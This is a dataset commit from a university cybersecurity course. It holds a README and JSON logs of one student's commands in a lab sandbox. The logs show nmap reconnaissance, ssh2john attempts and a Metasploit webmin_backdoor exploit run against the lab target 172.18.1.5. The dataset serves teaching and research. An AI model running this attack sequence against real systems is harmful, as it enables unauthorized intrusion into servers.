Add dataset 2022-05-04 PA197 seminar (9ea3a1ef) · Commits · KYPO Analyst / data

2022-05-04 PA197 seminar/README.md

0 → 100644

+9 −0

Original line number	Diff line number	Diff line
		* Brief description of the event: PA197 Secure Network Design course
		* Number of trainees/teams: 48 individuals
		* Number of files with command histories: 48
		* Total number of commands in those files: 4507
		* Number of files with training events: 48
		* Total number of events in those files: 1980
		* Who were the trainees: computer science students
		* Start time: May 04, 2022, 08:30 (1st seminar group), 12:00 (2nd seminar group), 14:30 (3rd seminar group), all in CEST + 1 student playing the next day
		* End time: May 04, 2022, 10:30 (1st seminar group), 14:00 (2nd seminar group), 16:30 (3rd seminar group), all in CEST + 1 student playing the next day
		No newline at end of file

2022-05-04 PA197 seminar/command_histories/sandbox-643-details/level33-useractions.json

0 → 100644

+0 −0

Empty file added.

2022-05-04 PA197 seminar/command_histories/sandbox-643-details/level34-useractions.json

0 → 100644

+18 −0

Original line number	Diff line number	Diff line
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:41:40.556Z","sandbox_id":"643","cmd":"ls","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:41:48.004Z","sandbox_id":"643","cmd":"ssh2john.py","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:41:54.456Z","sandbox_id":"643","cmd":"python ssh2john.py","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:41:59.445Z","sandbox_id":"643","cmd":"clear","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:43:32.345Z","sandbox_id":"643","cmd":"nmap -sL 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:43:56.625Z","sandbox_id":"643","cmd":"nmap 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:45:46.022Z","sandbox_id":"643","cmd":"nmap -sV 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:47:37.768Z","sandbox_id":"643","cmd":"nmap -sV -p22 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:50:05.802Z","sandbox_id":"643","cmd":"nmap -sC -p22 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:50:29.009Z","sandbox_id":"643","cmd":"nmap -sC -p10000 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:51:35.309Z","sandbox_id":"643","cmd":"ls","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:51:39.306Z","sandbox_id":"643","cmd":"python ssh2john.py","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:52:06.568Z","sandbox_id":"643","cmd":"python ssh2john.py 23:f3:2b:39:32:b5:b9:b1:14:43:d5:75:7e:50:53:22","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:54:27.904Z","sandbox_id":"643","cmd":"nmap -A 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:54:46.358Z","sandbox_id":"643","cmd":"nmap -A 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:56:43.850Z","sandbox_id":"643","cmd":"nmap -sV -p22 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:57:42.598Z","sandbox_id":"643","cmd":"nmap -sV 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T06:59:02.415Z","sandbox_id":"643","cmd":"nmap -sV 172.18.1.5","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}

2022-05-04 PA197 seminar/command_histories/sandbox-643-details/level35-useractions.json

0 → 100644

+3 −0

{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:04:54.047Z","sandbox_id":"643","cmd":"search webmin","pool_id":"70","cmd_type":"msf-command"}

{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:05:16.642Z","sandbox_id":"643","cmd":"info 0","pool_id":"70","cmd_type":"msf-command"}

{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:06:38.681Z","sandbox_id":"643","cmd":"info 5","pool_id":"70","cmd_type":"msf-command"}

2022-05-04 PA197 seminar/command_histories/sandbox-643-details/level36-useractions.json

0 → 100644

+21 −0

Original line number	Diff line number	Diff line
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:09:09.390Z","sandbox_id":"643","cmd":"Metasploit","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:09:29.091Z","sandbox_id":"643","cmd":"exit","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:09:29.168Z","sandbox_id":"643","cmd":"msfconsole","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:09:42.780Z","sandbox_id":"643","cmd":"Metasploit","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:13:38.859Z","sandbox_id":"643","cmd":"exploits","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:13:46.933Z","sandbox_id":"643","cmd":"help","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:15:43.711Z","sandbox_id":"643","cmd":"search help","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:16:35.932Z","sandbox_id":"643","cmd":"search Webmin","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:16:55.340Z","sandbox_id":"643","cmd":"run use exploit/linux/http/webmin_backdoor","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:17:24.676Z","sandbox_id":"643","cmd":"use exploit/linux/http/webmin_backdoor","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:17:38.014Z","sandbox_id":"643","cmd":"connect","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:18:04.999Z","sandbox_id":"643","cmd":"connect 172.18.1.5 10000","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:21:02.255Z","sandbox_id":"643","cmd":"use exploit/linux/http/webmin_backdoor","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:21:05.654Z","sandbox_id":"643","cmd":"exir","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:21:06.900Z","sandbox_id":"643","cmd":"exit","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:21:06.998Z","sandbox_id":"643","cmd":"msfconsole Metasploit","pool_id":"70","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:21:42.120Z","sandbox_id":"643","cmd":"use exploit/linux/http/webmin_backdoor","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:22:06.171Z","sandbox_id":"643","cmd":"show options","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:23:08.228Z","sandbox_id":"643","cmd":"set RHOST 172.18.1.5","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:23:49.884Z","sandbox_id":"643","cmd":"set LHOST 10.1.135.83","pool_id":"70","cmd_type":"msf-command"}
		{"hostname":"attacker","ip":"10.1.135.83","timestamp_str":"2022-05-04T07:23:53.138Z","sandbox_id":"643","cmd":"EXPLOIT","pool_id":"70","cmd_type":"msf-command"}

Original line number	Diff line number	Diff line
		* Brief description of the event: PA197 Secure Network Design course
		* Number of trainees/teams: 48 individuals
		* Number of files with command histories: 48
		* Total number of commands in those files: 4507
		* Number of files with training events: 48
		* Total number of events in those files: 1980
		* Who were the trainees: computer science students
		* Start time: May 04, 2022, 08:30 (1st seminar group), 12:00 (2nd seminar group), 14:30 (3rd seminar group), all in CEST + 1 student playing the next day
		* End time: May 04, 2022, 10:30 (1st seminar group), 14:00 (2nd seminar group), 16:30 (3rd seminar group), all in CEST + 1 student playing the next day
		No newline at end of file